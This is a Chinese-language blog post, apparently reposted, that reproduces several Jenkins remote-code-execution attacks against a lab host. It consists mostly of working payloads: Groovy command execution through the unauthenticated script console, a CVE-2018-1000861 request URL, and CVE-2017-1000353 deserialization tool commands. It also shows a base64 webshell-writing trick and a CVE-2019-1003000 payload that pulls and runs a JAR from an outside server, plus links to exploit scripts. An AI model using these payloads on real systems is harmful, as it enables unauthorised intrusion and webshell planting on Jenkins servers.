Jenkins漏洞利用复现

  • A+
所属分类:安全文章

一、未授权访问

访问url:

http://172.16.20.134:8080/script

Jenkins漏洞利用复现

命令执行

println "ls -al".execute().text

也可以利用powershell 或者python脚本反弹shell

Jenkins漏洞利用复现


二、CVE-2018-1000861 远程命令执行漏洞

payload:

securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {  public x(){    "touch /tmp/success".execute()  }}

&value=转成url编码

Jenkins漏洞利用复现

发送get请求:

Jenkins漏洞利用复现

python脚本:

https://github.com/orangetw/awesome-jenkins-rce-2019/blob/master/exp.py


三、CVE-2017-1000353 远程代码执行

工具地址:https://github.com/vulhub/CVE-2017-1000353

 https://ssd-disclosure.com/archives/3171

# 生成serjava -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar 1.ser "touch /tmp/1.jsp" # 发送serpython exploit.py http://172.16.20.134:8080 1.ser

exploit.py这里要注释下,如果你使用代理的话可以添加,这里只是复现,用不到。

Jenkins漏洞利用复现

另外一个linux写shell的小技巧:

echo base64后的木马内容 |base64 -d > 1.jsp

jsp生成成功

Jenkins漏洞利用复现


四、CVE-2019-1003000  远程代码执行漏洞

漏洞利用

http://url.com/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='payload', root='http://poc.com')%0a@Grab(group='package', module='payload', version='1')%0aimport Payload;

poc.com是保存了JAR文件的服务器域名。

group、module、version的值对应了该jar文件的存放路径。

修改version的值,对应的jar包的访问路径和文件名也发生改变。


Jenkins漏洞利用复现

脚本:https://github.com/wetw0rk/Exploit-Development/blob/master/CVE-2019-1003000%20%26%26%20CVE-2018-1999002%20-%20preAuth%20Jenkins%20RCE/sploit/jenkins-preauth-rce-exploit.py

https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc


文章转载自:https://www.cnblogs.com/junsec/p/11593556.html作者:Junsec


没有专业运营团队,纯个人凭着空闲时间的学习,通过网络搜集与学习整理的资料记录并分享。

 如果觉得文章对你有帮助,请支持下点击右下角“在看”

Jenkins漏洞利用复现


本文始发于微信公众号(LemonSec):Jenkins漏洞利用复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: